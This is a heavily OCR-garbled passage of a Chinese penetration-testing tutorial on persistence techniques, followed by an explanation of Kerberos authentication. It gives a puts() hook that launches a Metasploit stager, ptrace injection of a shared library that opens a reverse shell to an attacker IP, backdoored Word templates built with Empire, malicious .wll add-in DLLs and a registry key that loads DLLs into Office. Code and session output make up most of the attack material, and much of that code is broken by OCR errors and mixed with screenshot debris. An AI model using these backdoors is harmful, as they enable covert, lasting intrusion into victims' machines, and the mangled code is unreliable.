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; ioami 后 ， 由 于 底层 会 调用 puts 函 数 ， 因 此 也 会 执行 python 命令 ，Metasploit 不 出 意外 的 获得 
e erpreter: » í 


1 cribpt/s delivery) > 
170.142 | web delivery - Delivering Payload (454) bytes 
stage (53755 bytes) to 192.168.170.142 
er session 4 opened (192,168.170.138:443 -> 192,168.170.142:44438) at 2019-12-25 03:35:05 -0500 


) > sessions -i 


Type Information Connection 


meterpreter python/python 192.168.170,138:443 -> 192.168.170.142:44438 (192.168.170.142) 


xploití 





, ， 为 了 防止 在 短 时 间 内 获得 多 个 重复 的 会 话 ， 因 此 需要 优化 一 下 代码 ， 例 如 以 某 个 文件 行 数 和 
用 puts 函 数 的 次 数 进 行 取 余 ， 就 能 够 达到 执行 多 少 次 puts 函 数 获得 一 次 Meterpreter。 优化 代码 如 
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#include <unistd.h> 
#include <dlfcn.h> 
#include <stdlib.h> 
#include <sys/stat.h> 
#define BUFFER_SIZE 100 
#define COMMAND_NUM 5 
int check file 

int file line - 9; 

char buffer[BUFFER SIZE]; 

FILE *fp - NULL; 

fp = fopen(filename, r"); 

if (fFp==NULL){ 

return file_line; 





(char * filename){ 


while(fgets(buffer, BUFFER_SIZE, fp)!= NULL){ 
file_line ++; 


} 
fclose(fp); 
return file line; 
: 
void add file line(char * filename){ 
FILE * fp = NULL; 
fp = fopen(filename, "a+"); 
if(fp == NULL)£ 
return; 
} 
fputs("1Nn",fp); 
fclose(fp); 
} 


void call_system(){ 


system("python -c \"import sys;u=__import__('urllib'+{2:'',3: 


int puts(const char *me ge) { 
char * filename = "/tmp/err.log"; 
int (*new_puts)(const char *message); 
int result; 
int file lines = 9; 
new puts = dlsym(RTLD NEXT, "puts"); 
add file line(filename); 
file lines - check file line(filename); 
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Ment’ ("[+]file ,file lines, COMMAND NUM); 
Efile lines * COMMAND NUM == 9)( 

B call system(); 

J 

result = new puts(message); 

return result; 





rvnoxsyGvirtual-machine: ~/Project 





Help 






- Edit View Search Terminal 
<sy@virtual-machine:~/Project$ whoami 
|file line : 4, NUM = 5 
nOxsy 
exsy@virtual-machine:~/Project$ whoami 
file line : 5, NUM = 5 
nOxsy 
oxsy@virtual-machine:~/Project$ B 


在 执行 至 第 零 次 、 五 次 时 ， 成 功 返 回 了 会 话 : 





exploit{ 
xploit( 
ploit( 
oitt{ 
ploit( ript ielivery) > 
.168.170.142 web delivery - Delivering Payload (454) bytes 
ding stage (53755 bytes) to 192.168.170.142 
preter session 17 opened (192.168.170.138:443 -> 192.168.170.142:44500) at 2019-12-25 04:11:27 -0500 





F COMMAND NUM 可 自 定义 


| 
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Linux 权 限 维 持 之 进 程 注入 


通过 进程 注入 技术 ， 能 够 使 得 动态 链接 库 被 加 载 到 一 个 正在 运行 的 进程 ， 因 此 较为 隐蔽 。 进 程 注入 
通过 调用 ptrace() 实现 了 与 Windows 平 台 下 相同 作用 的 API 函数 createRemoteThread() 。 在 
许多 Linux 发 行 版 中 ， 内 核 的 默认 配置 文件 /proc/sys/kernel/yama/ptrace scope 限制 了 一 个 
进程 除了 fork() 派生 外 ， 无 法 通过 ptrace() 来 操作 另外 一 个 进程 。 


48 


得 动态 


/LA 


要 注入 进程 前 ， 需 要 关闭 这 个 限制 《Root 权限 ) 


echo © | sudo tee /proc/sys/kernel/yama/ptrace scope 


rvnOoxsyGvirtual-machine:-/Project$ cat /proc/sys/kernel/yama/ptrace scope 
H 


rvnOüxsyGvirtual-machine:-/Project$ echo 0 | sudo tee /proc/sys/kernel/yama/ptrace scope 
[sudo] password for rvnOxsy: 

0 
rvnOxsy@virtual-machine:~/Project$ 


在 Github 上 已 经 有 了 关于 进程 注入 的 实现 代码 : 





https://github.com/gaffe23/linux-inject 


下 载 后 进入 项 目 目录 ， 执 行 : make x86_64 即 可 编译 64 位 的 linux-inject。 


rvn0xsy @virtual-machine: ~/Projects/linux-inject 


File Edit View Search Terminal Help 

rvnüxsyGvirtual-machine:-/Projects$ git clone https://github.com/gaffe23/linux-inject 
Cloning into 'linux-inject'... 

remote; Enumerating objects: 403, done. 

remote; Total 403 (delta 0), reused 0 (delta 6), pack-reused 403 

Receiving objects: 100% (403/403), 263.41 KiB | 14.00 KiB/s, done. 

Resolving deltas: 100% (239/239), done. 


rvn@xsy@virtual-machine:~/Projects$ cd linux-inject/ 


rvnoxsy@virtual -machine:~/Projects/Linux- 
inject-arm.c inject-x86.c Makefile 
inject-x86 64.c LICENSE.txt ^X ptrace.c 
rvnOxsy@virtual-machine:~/Projects/Linux- 
-Std=gnu99 -ggdb -o inject utils.c 


inject$ ts 

ptrace.h X sample-library.c 
README.md . sample-target.c 
inject$ make x86 64 

ptrace.c inject-x86 64.c -ldl 


slides BHArsenal2015.pdf utils.h 


utils.c 


-std=gnu99 -ggdb -D GNU SOURCE -shared -o sample-library.so -fPIC sample-library.c 
-std=gnu99 -ggdb -o sample-target sample-target.c 

-m32 -stdsgnu99 -ggdb -o inject32 utils.c ptrace.c inject-x86.c -ldl 

-m32 -std-gnu99 -ggdb -D GNU SOURCE -shared -o sample-library32.so -fPIC sample-library.c 
-m32 -std-gnu99 -ggdb -o sample-target32 sample-target.c 


rvnOüxsyGvirtual-machine:-/Projects/linux- 
inject-x86 64.c Makefile 
inject-x86.c ptrace.c 

inject-arm.c LICENSE.txt ptrace.h 

rvnüxsyQGvirtual-machine:-/Projects/linux- 





确认 编译 是 否 正常 : 


inject$ ls 
README . md 
sample-library32.so 
sample-library.c 
injects 


Sample-Llibrary.so utils.h 
sample-target 


Sample-target32 


samp le-target .< 
slides BHArsenal2015. pdf 
utils.c 
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rynOxsy@virtual-machine: ~/Projects/inux-inject 


Search Terminal Help 


rvnOxsy @virtual-machine: ~/Projects/linux-inject 


File Edit View Search Terminal Help 


rvnexsy@virtuat: machine:~/Projects/linux-inject$ ps -ef } grep sample 

24119 19749 ` 60:00:00 ./ -target 

24113 24102 E 00:00:00 grep --color=auto 

irtual-machine: Uinux-injects ./inject -p 24116 ./sample- 

library32,so0 sample-Library.so sample-target32 

sample-library.c sample-targe j. sample-target.c 
rvnOxsy@virtual-machine:~/Projects/Linux-inj :/inject -p 24116 ./sample-library.so 
targeting process with pid 24110 
could not inject "./sample-library.so* 
rvnüxsyGvirtual-machine:-/Projects/linux-inj 





; 取 sample-target 的 PID 后 ， 调 用 inject 程 序 来 注入 sample-library.so， 注 入 成 功 会 输出 "| just got 
loaded”. 接 下 来 ， 需 要 更 改 sample-target.c 文 件 ， 编 译 成 需要 的 权限 维持 动态 链接 库 。 


Linclude «stdio.h» 
T include <unistd.h> 
“#include «dlfcn.h» 
Minclude <stdlib.h> 


> void 

Et 

BE printt("r : E 

f system("bash -c \"bash -i >6 v/tcp/192. 38/139 O>&1\""); 
D 


— attribute ((constructor)) 
void 
p 
shell(); 


通过 如 下 命令 编译 so 文件 : 


clang -std-gnu99 -ggdb -D GNU SOURCE -shared -o u9.so -lpthread -fPIC U3.c 
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rvnoxsyGvirtual-machine: -/Documents 


SET rmachine:+/Documentss clang -std-gnu99 -ggdb -D GNU SOURCE -shared -0 u9.so -fPIC U3.c 
rynoxsyévirtual-machin ocuments$ iu 


U3.c (-/Documents 














编译 成 so 文件 成 功 后 的 测试 效果 : 





rynOxsy@virtual-machine: ~/Project/linux-inject 


rvnoxsy@virtual-machine:~/Project/linux-inject$ ./inject -p 24428 -/Documents/u9.50 
targeting process with pid 24428 

ptrace(PTRACE GETSIGINFO) failed 

rvnüxsyavirtual-machine:-/Project/línux-inject$ ./inject -p 24428 -/Documents/u9.50 
targeting process with pid 24428 

^/home/rvn8xsy/Documents/u9.so" successfully injected 
rvnOxsy@virtual-machine:~/Project/linux-inject$ 


I just got "loaded 


Mum 


在 Kali Linux 这 边 获 得 了 bash shell: 
t@kal root@kali: /tmr rvnOxsy@virtua...t/linux-inject 


it-4 nc -lyp 139 
Tdi on [any] 139 ... 
192.168.170.142: inverse host lookup failed: Unknown host 
connect to [192.168.170.138] from (UNKNOWN) [192.168.170.142] 47256 


rvnOxsy@virtual-machine:~/Project/linux-injects$ Bi 





此 时 发 现 测试 程序 的 主线 程 被 bash 阻 塞 了 ， 于 是 可 以 采用 多 线程 技术 ， 将 后 门 代 码 与 正常 逻辑 分 离 
执行 。 
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tvnOxsy@virtual-machine: -/Documents 











View S t Terminal Help 
virtual-machine:~/Documents$ clang -std=gnu99 -ggdb -D GNU SOURCE -shared -o u9.so -lpthread -fPIC U3.c 


y@virtual-machine: ~/Documentss 日 


U3.c (-/Documents) 






















eae View Search Tools Hel 
Dg ^ e Aa 
waved Document! x utc Xx U2c X U3.c X 


ude 
lude 
Include 
lude 
lude 


dH * shell() 


printf ( ); 
system( E 
return 


attribute ((constructor)) 


pthread t thread id; 
pthread create(&thread id, shell, 


] 


看 到 IP 地 址 和 端口 : 





rvn0xsy @virtual-machine: -/Project/l 





Edit 
Oxsy@virtual-machine:~/Project/linux-inject$ ps -ef | grep sample 
24512 19749 © 18:42 pts/4 00:00:00 ./ -target 

E 24516 18613 0 18:42 pts/3 00:00:00 grep --color=auto 

sy@virtual-machine:~/Project/linux-inject$ ./inject -p 24512 ~/Documents/u9.so 

ting process with pid 24512 

/rvnüxsy/Documents/u9.so" successfully injected 

nüxsyGvirtual-machine:-/Project/linux-inject$ [] 


Search Terminal 


View 








Help 





rvnüxsyGvirtual-machine: ~/Projects/linux-inject 











Terminal 





View Search Help 


eping... 
eping... 
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rvnOxsy @virtual-machine: ~/Project/linux-inject 
Search Terminal Help 


rynOxsy@virtual-machine:~/Project/linux-injects ps -ef | grep sample 

rvnOxsy 24512 19749 0 18:42 pts/4 00:00:00 . é-target 

rvnOxsy 24516 18613 @ 18:42 pts/3 90:00:00 grep --colorzauto 
rvnüxsyGvirtual-machine:-/Project/linux-injects .Jinject -p 24512 -/Documents/U9.50 

targeting process with pid 24512 

*/home/rvn8xsy/Documents/u9.so" successfully injected 

rvnOxsy@virtual -machine:~/Project/linux-injects ps -ef | grep bash 

fynOxsy 17996 17989 18:51 pts/6 200: 

'rynüxsy | 18145 17989 18:56 pts/2 

fvnexsy 18613 17989 11:08 pts/3 

rvnOxsy 19749 17989 741 pts/4 

rvnOxsy . 24102 17989 pts/5 100: ; 

rvnüxsy © 24528 24512 pts/4 700: - an -i »& /dev/tcp/192.168.170.138/139 0»&1" 
ryagxsy — 24529 24528 pts/4 ` -i »& /dev/tcp/192.168.170,138/139 O>&1 
rvnOxsy. 24530 24529 pts/4 : > 

rvnüxsy 24544 18613 18:43 pts/3 :00:00 grep --color=auto 

rvnexsy@virtual -machine;~/Project/linux-inpjects t 


人 


rynüxsyevirtual-machine: ~/Projects/linux-inject 
File Edit View Search Terminal Help 


sleeping... 
sleeping. 
sleeping... 
sleeping... 
sleeping. 
sleeping... 
sleeping... 
sleeping. 
sleeping. 
sleeping. 
Sleeping. 
Sleeping. 
Sleeping... 
Sleeping... 
I just got loaded 
Sleeping... 
Sleeping. 
Sleeping. 
sleepin 
steeping.. 
sleepi 


再 继续 改进 代码 ， 采 用 socket 套 接 字 的 方式 来 反弹 shell: 
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«stdio.h» “ 
<dlfcn.h> 
<stdlib.h> 

«pthread.h» 

<stdio.h> 

<sys/types.h> 

«sys/socket.h» 

<unistd.h> 

«fcntl.h» 

«stdio.h» 

<sys/types.h> 

«sys/socket .h» 

«netinet/in.h» 

<netdb.h> 




















struct sockaddr_in server; 


Pint sock; 
char shell[]-z"/bin/bash"; 
if((sock = socket(AF INET, SOCK STREAM, ©)) == -1) { 


return NULL; 


server.sin family - AF INET; 

Server.sin port = htons(:32); 

Server.sin addr.s addr = inet_addr ("192.168.170.138"); 

if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) 
return NULL; 

j 

dup2(sock, ©); 

dup2(sock, 1); 

dup2(sock, ?); 

execl(shell,"/bin/bash",(char *)8); 

close(sock); 

printf("I just got loaded\n"); 


return NULL; 


pthread t thread id; 
pthread create(&thread id, NULL, hello, NULL); 
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tyn0xsy@virtual-machine: ~/Project/linux-inject 


rvnOxsyévirtual-machine:-/Proj i i $ ps -ef | grep sample 
Cnbxsy .24581' 19749 80 18:46 pts/4 0 ./:s-cte-target 
ryn@xsy 24597 18613 @ 18:47 pts/3 g -Colorsauto 
rynxsyQvirtual-machine:-/Project/linux: inj [inject <p 24581 -/Docusents/u10.so 
targeting process with pid 24581 
ptrace(PTRACE OETSIGINFO) failed 
rynüxsyevirtual-machine:-/Project/linux-inject$ ./inject -p 24581 -/Documents/ul0. so 
targeting process with pid 24581 
"n /home / rvnQx s y /0i ents/uld.so" successfully injected 

virtual-machine:-/P. t 


rtual-machite:- 
implicit declaration of function 
ddr = inet addr(^192.168.176.13 


rvnexsy 
TvhOxsy 
fVhOXSy. 
rvogxsy 
fvnOxsy 24 17989 
rvnóxsy 19749 
FynOxs 18145 
En 


root (àkali: ~ 
i:-4 nc -lyp 139 


listening on [any] 139 ... 
192.168.170.142: inverse host lookup failed: Unknown host 


rynoxsyevirtual-machíne: -/Documents 


b -D GNU SOURCE -shared -o uld.so -lpthread -fPIC U3.¢ 
net_addr' is invalid in C99 [-Wimplicit-function-declaration] 


--€0lorsauto 





connect to [192.168.170.138] from (UNKNOWN) [192.168.170.142] 47266 


ups=1000( rvnOxsy) ,4(adm) ,24(cdrom) , 27(sudo) ,30(dip) ,46(f 


在 实战 应 用 中 ， 需 要 关闭 ptrace 的 限制 ， 然 后 注入 .so 到 某 个 服务 进程 中 ， 这 样 达到 权限 维持 的 目 


的 。 
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文档 


gt 


tu 









车 夹 存储 着 用 户 所 有 的 模版 文件 ， 用 户 可 根据 自身 需求 ， 定 制 不 同 字体 、 颜 色 、 背 景 的 基础 模 
每 当 新 建 一 个 Office 文 件 时 都 会 使 用 一 个 默认 的 模版 。 





m - 
Im » user » AppData » Roaming » Microsoft » Templates > 7 emplates 





包含 到 库 中 ~ EDI 新 建文 件 夹 Saal. 
LiveContent 


osoft 





E : à. Normal.dotm 
i 最 近 访 问 的 位 置 四 ”欢迎 使 用 Word 2013.dotx 





RAirracnt 
Microsoft 


果 将 恶意 宏 谋 入 到 模版 中 ， 就 可 以 形成 持续 性 控制 。 受 害 者 可 能 每 天 都 会 运行 Microsoft Word 等 
用 ， 每 当 运 行 时 都 会 触发 文件 ， 以 达到 维持 效果 。 


用 Powershell Empire 可 以 自动 生成 Office 宏 文件 前 提 : 开启 Empire 监听 


Usestager windows/macro 
Set Listener http 
execute 
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(Empire) » usestager 
multi/bash 
multi/launcher 
multi/macro 
multi/pyinstaller 
multi/war 
osx/applescript 
osx/application 
osx/ducky 

osx/dylib 


osx/macho 

osx/macro 

osx/pkg 

osx/safari launcher 
osx/teensy 

windows /backdoorLnkMacro 
windows/bunny 
windows/csharp exe 
windows/dll 

osx/jar windows/ducky 
osx/launcher windows/hta 

(Empire) » usestager windows/macro 

(Empire: stager/windows/macro) » set Listener http 
(Empire: stager/windows/macro) > execute 


[*] Stager output written out to: /tmp/macro 


生成 的 宏 可 以 直接 插入 模板 文档 中 。 可 以 使 用 混淆 来 逃避 现 有 端 


f| Microsoft Visual Basic for Applications - Normal 














文件 (F) 编辑 (E) 视图 (V) EA ”格式 (Q) 调试 (D) 运行 (R) TAC 人 外接 程 序 (A) BOW) 
lj a d A A ^» o4 g acf 47 29 , 7147 
Lt Norma x 
- Y 
& Normal { oi mde ams VS ROAR Ue ROM MAT TMNT eT ere RENE 
ft Word | «M Normal - NewMacros (代码 ) 
ns (通用 ) 
& Project (文档 1) | Sub Open Ü 
P zt "orc 
Autor ) 
x 











当 用 户 打 开 带 有 恶意 宏 模板 文件 时 ， 将 执行 代码 ， 
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windows/launcher bat 
windows/launcher lnk 
windows/launcher sct 
windows/ launcher vbs 
windows/ launcher xml 
windows/macro 
windows/macroless msword 
windows/shellcode 
windows/teensy 





cH 


AMO 


帮助 (H) 





就 可 以 达到 上 线 效 果 。 





spire: agents) > [*] Sending POWERSHELL stager (stage 1) to 10.0.2.40 
New agent ULHTV86K checked in 

| Initial agent U1HTV86K from 10.0.2.40 now active (Slack) 
sending agent (stage 2) to UIHTV86K at 10.0.2.40 
sending POWERSHELL stager (stage 1) to 10.0.2.40 
New agent KVN4982A checked in 

| Initial agent KVN4982A from 10.0.2.40 now active (Slack) 
Sending agent (stage 2) to KVN4982A at 10.0.2.40 
Sending POWERSHELL stager (stage 1) to 10.0.2.40 
New agent VRGYK5DN checked in 

] Initial agent VRGYK5DN from 10.0.2.40 now active (Slack) 
Sending agent (stage 2) to VRGYKSDN at 10.0.2.40 


| Empire: agents) > [*] Sending POWERSHELL stager (stage 1) to 10.0.2.40 
J+] New agent 27R6KVHS checked in 
.] Initial agent 27R6KVHS from 10.0.2.40 now active (Slack) 
Sending agent (stage 2) to 27R6KVHS at 10.0,.2.40 


本 icejn 载 项 用 于 扩展 Office 程 序 的 功能 。office 启 动 时 ， 将 对 存储 外 接 程 序 的 文件 夹 进行 检查 ， 以 
几 便 应 用 程序 加 载 它 们 。 可 以 执行 以 下 命令 来 发 现 可 放置 外 接 程序 的 Microsoft Word 的 受信 任 位 置 。 


Get-ChildItem "hkcu:\Software\Microsoft\Office\15.0\Word\Security\Trusted Locati 


Ex 管理 员 : Windows PowerShell ' 
PS C:\Windows\system32> Get-ChildItem “hkcu:\Software\Microsoft\Office\15.0\Word\Security\Trusted Locations" 


Hive: HKEY_CURRENT_USER\Software\Microsoft\0ffice\15.0\Word\Security\Trusted Locations 


Property 


2 Locationo {Path, Description} 
3 Locationi {AllowSubFolders, Path, Description) 
2 Location2 (Path, Description) 


PS C:\Windows\system32> 


Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved. 


PS C:\Users\Admin> Get-ChildItem “hkcu: \software\Microsoft\Office\16.O\word\Security\Trusted Locations" 
Hive: HKEY_CURRENT_USER\Software\Microsoft\office\16.0\word\security\Trusted Locations 


Property 


+ C:\Users\Admin\AppData\Roaming\Microsoft\Templates 
Description : 0 
AllowSubFolders : 1 
Path : C:\Program Files (x86)\Microsoft Office\Templates\ 
Description M 
Path : C:\Users\Admin\AppData\Roaming\Microsoft\word\Startup 
Description : 2 


PS C: NUsersMAdmin» m 


注意 : 15.0. 16.0 对 应 office 2013. 2016 





Windows 的 动态 链接 库 文件 后 缀 是 DLL， 而 Office 的 加 载 项 也 类 似 动态 链接 库 ， 例 如 ，.wll (对 于 
Word) 和 .xll (对 于 Excel) 。Metasploit 中 msfvenom 可 用 于 创建 可 执行 代码 的 DLL 文 件 。 将 扩展 
名 修改 为 " .wll ”(Word 加 载 项 扩展 名 ) 并 将 文件 移 至 Word 启 动 文 件 来 ， 加 载 项 将 在 每 次 启动 时 被 执 
行 。 


启动 文件 夹 : 


%appdata%\Microsoft\Word\STARTUP 











组 织 ~ 打开 共享 ~ 新 建文 件 夹 d @ 


收藏 来 

?下载 test.wll 19/12/31 14:4 Word Adding 
@ 桌面 
a» 最 近 访 问 的 位 置 


5 文档 


4 音乐 
A 计算 机 
msf5 exploit( ) » exploit 
[*] Started reverse TCP handler on 10.0.2.21:4445 


[*] Sending stage (179779 bytes) to 10.0.2.40 
[*] Meterpreter session 1 opened (10.0.2.21:4445 -» 10.0.2.40:61442) at 2019- 


17 15:01:27 -0500 


meterpreter » getuid 
Server username: VEGA\Admin 


meterpreter > fi 


该 代码 将 被 执行 ，Msf 上 线 。 但 是 ， 这 将 导致 软件 骨 溃 ， 并 向 用 户 提供 该 软件 已 被 修改 或 需要 重新 
安装 的 提示 信息 。 





创建 一 个 不 会 导致 应 用 程序 失败 的 自 定义 DLL。 


DLL PROCESS ATTACH 将 DLL 加 载 到 当前 进程 (Word, Excel PowerPoint) 的 虚拟 地 址 空间 。 
DLL 加 载 后 ， 将 启动 任意 可 执行 文件 ， 该 可 执行 文件 将 打通 和 Msf 的 通信 管道 。 
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i // 
— #include 
#include <stdlib.h> 


BOOL 
{ 
(ul_reason_for_call) 
{ 
case DLL_PROCESS_ATTACH: 
system( We 
case DLL_THREAD_ATTACH: 
DLL_THREAD_DETACH: 
case DLL_PROCESS_DETACH: 
} 
return TRUE; 
} 


<stdlib.h> 


BOOL APIENTRY DllMain( HMODULE 
DWORD 
LPVOID. i 


switch (ul 

( 

case DLL PROCESS ATTACH: 
system("start pentestlab32.exe"); 

case DLL THREAD ATTACH: 

case DLL, THREAD DETACH: 

case DLL PROCESS DETACH: 
break; 


} 
return TRUE; 





ee 


Word 加 载 项 的 扩展 名 为 “ .wl "， 本 质 上 是 DLL 文件 ， 这 些 文件 放置 在 Word 启 动 文 件 夹 中 ， 并 在 每 次 
程序 启动 时 被 加 载 。 


1431 


Local Disk (C) » Users » Admin >» AppData » Roaming » Microsoft » Word » STARTUP 





WordAddin.wll 


Word 每 次 启动 加 载 项 时 将 加 载 (WLL) ， 并 执行 从 而 上 线 。 
sf5 exploit(multi/hai r) > exploit 

[*] Started reverse TCP handler on 10.0.2.21:4445 
[*] Sending stage (179779 bytes) to 10.0.2.490 


[*] Meterpreter session 3 opened (10.0.2.21:4445 -> 10.0.2.40:55282) at 2019-11- 
17 17:22:54 -0500 





三 好 学 生 大 化 写 过 一 个 Ps1 脚 本 ， 可 生成 word、execl、ppt 的 恶意 加 载 项 。 达 到 持续 性 控制 的 效果 
工具 链接 : XE: 


该 脚本 能 够 生成 关联 文件 (WLL, XLL, VBA) ， 并 将 这 些 文件 复制 到 Word，Excel 或 PowerPoint 
的 启动 文件 夹 中 。 


Import-Module .NOfficePersistence.psi 
WordwLL 


PS C:\Users\Admin> cd .\Office-Persistence 

PS C:\Users\Admin\Office-Persistence> Import-Module .\officePersistence.ps1 
PS C:\Users\Admin\Office-Persistence> WordWLL 

[*] Microsoft office Version: 16 

[+] OS: x64 


[+] Microsoft Office bit: 32-bit 

[+] I copy calc. x86.w11 

[+] Done. 

PS C:\Users\Admin\Office-Persistence> 





默认 情况 下 ， 此 脚本 会 弹出 计算 器 。 该 脚本 将 DLL 文件 的 恶意 代码 部 分 进行 了 base64 编 码 。 可 以 修 
改 为 任何 其 他 恶意 DLL。 


$fileContentBytes = [System.Convert]: :FEromBase64String($fileContent ) 
[System.IO.File]::WriteAllBytes($env:APPDATA-* 
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*  AaBbCcDc AaBbCcDc AaB a 


= : ; T val Si | ling 1 


Calculator 


View Edit Help 





注册 表 启 动 


创建 注册 表 的 键 并 将 其 指向 任意 一 个 DLL 文件 ，Office 将 会 使 用 此 键 来 加 载 DLL 文 件 ， 以 便 在 开发 阶 
段 进行 性 能 评估 。 从 CMD 中 执行 以 下 操作 ， 将 创建 指向 本 地 存储 的 DLL 文件 的 键 。 


reg add "HKEY CURRENT USERNSoftwareNMMicrosoftNOffice test\Special\Perf" /t REG S 
4 > 
osoft Windows [Version 6.1.7601] 
pyright (c) 2009 Microsoft Corporation. All rights reserved 
rs\Admin>reg add “HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf” /t REG. SZ /d C:\ 


pentestiab.dll 
he operation completed successfullu 


Users\Admin> 
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从 注册 表 中 查看 : 
AX Registry Editor d | 
File Edit View Favorites Help 
| MediaPlayer ^ Name Type Data 
| MS Design Tools 2 (Default) | REG SZ CAtmp pentestlab.dll 
MSDAIPP 
MSF 
Multimedia 
| Notepad 
| 4 Office 
| 16.0 
| Common 
| Excel 
| Outlook 
PowerPoint 
Word 
4 Office test 
4 Special 
Perf 

PeerNet 

Protected Storage Sys 
| RAS AutoDial 
| Remote Assistance x 
| « "m + 


Computer\HKEY CURRENT_USER\Software\Microsoft\Office test\Special\Perf 


当 Office 启 动 时 ， 将 加 载 DLL 文件 ， 从 而 上 线 。 


msf5 exploit(multi/hand ) » exploit 


[*] Started reverse TCP handler on 10.0.2.21:4445 

[*] Sending stage (179779 bytes) to 10.0.2.40 

[*] Meterpreter session 5 opened (10.0.2.21:4445 -» 10.0.2.40:65018) at 2019-11- 
17 18:09:46 -0500 





meterpreter > B 
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\ 章 内 网 渗透 基础 
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Kerberos 协 议 
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indows 认 证 原理 之 Kerberos 篇 
ctive Directory( 活 动 目录 ) 


AD 存 储 关 于 网 络 对 象 的 相关 信息 ， 使 管理 员 和 用 户 可 以 轻松 地 查找 并 使 用 这 些 信息 。 其 使 用 分 


里 成 组 织 的 逻辑 进行 结构 化 的 数据 存储 。 
疆 网 络 对 象 分 为 : 用 户 、 用 户 组 、 计 算 机 、 域 、 组 织 单位 以 及 安全 策略 等 


RAIEN Kerberos 





SRR 


Kerberos 是 一 种 网 络 认证 协议 ， 其 设计 目标 是 通过 密 钥 系统 为 客户 机 / 服务 器 应 用 程序 提供 强大 的 
认证 服务 。 该 认证 过 程 的 实现 不 依赖 于 主机 操作 系统 的 认证 ， 无 需 基于 主机 地 址 的 信任 ， 不 要 求 网 
有 络 上 所 有 主机 的 物理 安全 ， 并 假定 网 络 上 传送 的 数据 包 可 以 被 任意 地 读 取 、 修 改 和 插入 数据 。 在 以 
HERE, Kerberos 作为 一 种 可 信任 的 第 三 方 认证 服务 ， 是 通过 传统 的 密码 技术 (如: 共享 m 
L8) 执行 认证 服务 的 。 


参与 角色 


。 客户 端 
。 服务 器 
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。 KDC ( 密 钥 分 发 中 心 ) = DC 


ECL sd , » 


; Domain Controller 





sai EM 


| Ticket Granting 


i, b 
i. > 
eile UNSER RE NERER AM 


Client Server 


KDC 的 组 成 


。 AD (Account Database) : 存储 所 有 客户 端的 白 名 单 ， 只 有 在 白 名 单 中 的 客户 端 才 可 以 申请 
TGT 

* AS (Authetication Service) : 为 客户 端 生成 TGT 的 服务 

e TGS (Ticket Granting Service) :为 客户 端 生成 某 个 服务 的 ticket 


从 物理 层面 看 ，AD 与 KDC 都 是 域 控 (Domain Controller) 


域 认 证 流程 -粗略 流程 


1. 客户 端 向 Kerberos 服 务 请 求 ， 希 望 获得 访问 某 个 服务 /服务 器 的 权限 。 客 户 端 首先 向 Kerberos 请 
求 身份 认证 ，Kerberos 得 到 消息 后 ， 先 判断 客户 端 是否 可 信 的 既 白 名 单 中 ， 在 AD 查询 用 户 之 
后 ， 返 回 到 AS 中 ，AS 分 发 TGT 给 客户 端 ， 至 此 AS 的 工作 就 算是 完成 了 。 

2. 客户 端 得 到 TGT 后 ， 继 续 向 Kerberos 请 求 ， 希 望 获得 某 个 服务 /服务 器 的 权限 。Kerberos 得 到 消 
息 后 ， 通 过 客户 端 得 到 消息 中 的 TGT， 判 断 客户 端 是 否 拥 有 这 个 权限 ， 然 后 给 予 客 户 端 访 问 服 
务 器 的 权限 Ticket 

3. 客户 端 得 到 访问 服务 器 的 权限 Ticket 后 ， 就 可 以 向 服务 器 发 起 请 求 ， 这 个 Ticket 仅 针对 该 服务 
器 ， 其 他 Server 需 要 重新 向 TGS 申请 。 


类 似 于 动车 站 买 票 
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TET 


HE 

























输入 用 户 ID 和 密码 到 客户 端 
， 客 户 端 利用 质询 的 NTLM 协 议 将 密码 转换 成 密 钥 ， 形 成 了 客户 端的 “用 户 密 钥 ”(user's secret 
- key) 


一 步 -客户 端 认证 


ession Key 与 Ticket Granting Ticket 


. 客户 端 

B 向 Kerberos 发 送 客户 端 信息 信息 和 相应 的 请 求 服务 ， 例 如 “用户 Tom 想 要 请 求 服务 ”( 不 需要 发 
”” 送 密 钥 或 者 密码 ) 

2. Kerberos 

AS 检查 该 用 户 ID 是 否 存在 于 本 地 数据 库 中 ， 验 证 完成 后 返回 2 条 信息 


1. Client/TGS 会 话 密 钥 (Client/TGS Session key) ， 这 个 密 钥 用 来 在 客户 端 和 TGS 之 间 进 行 通 
，”“” 信 ， 使 用 该 用 户 的 NTLM Hash 进 行 加 密 

“2. 票据 授权 票据 (Ticket Granting Ticket) ,包含 信息 有 : 消息 1 中 的 会 话 密 钥 ， 用 户 ID， 用 户 网 
— 址 ， 消 息 2 的 有 效 期 。 通 过 TGS 的 密 钥 进 行 加 密 

3. SP i 


客户 端 收 到 消息 后 ， 首 先 用 自己 的 用 户 NTLM Hash 解 密 消息 1， 获 得 其 中 的 TGS 会 话 密 钥 注意 : 客 
户 端 不 需要 解密 消息 2， 只 需要 消息 1 中 的 TGS 会 话 密 钥 就 可 以 向 TGS 发 起 请 求 


第 二 步 -服务 授权 
3 Pin 
客户 端 想 要 申请 指定 的 服务 的 时 候 ， 向 TGS 发 送 两 条 消息 : 

- 工 消息 2 的 信息 、 想 要 获取 的 服务 的 服务 ID (不 是 用 户 ID) 

- 2. 认证 符 (Authenticator) ， 其 中 包含 用 户 ID 和 时 间 稚 ， 使 用 消息 1 中 解密 出 来 的 TGS 会 话 密 钥 进 
行 加 密 
Kerberos 


+ 在 收 到 客户 端 发 起 的 两 条 请 求 后 ，TGS 先 去 KDC 数 据 库 中 查找 客户 端 发 来 的 消息 3 中 的 服务 ID 
” 是 否 存在 ， 然 后 用 自己 的 TGS 密 钥 解密 消息 3 中 的 消息 2， 得 到 TGS 会 话 密 钥 
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。 使 用 TGS 会 话 密 钥 解密 消息 4， 得 到 用 户 ID 信 息 和 时 间 戳 ， 核 对 完成 之 后 向 客户 端 发 送 两 条 信 
息 " M 


。 客户 端 -服务 器 票据 (Client-to-Server Ticket) ， 其 中 包含 Client/SS 会 话 密 钥 (Client/Server 
Session Key) ， 用 户 ID， 用 户 网 址 和 票据 有 效 期 。 使 用 服务 器 密 钥 (Server's secret key) 进 
行 加 密 。 


。 Client/SS 会 话 密 钥 (Client/Server Session Key) ， 使 用 Clent/TGS 会 话 密 钥 进行 加 密 。 


客户 端 
。 客户 端 收 到 消息 后 ， 用 消息 1 中 的 Clent/TGS 解 密 消息 6， 得 到 其 中 的 Client/SS 会 话 密 钥 。 
。 而 消息 5 客户 端 是 无 法 解密 的 ， 它 用 服务 器 密码 进行 加 密 。 
第 三 步 -服务 请 求 
客户 端 
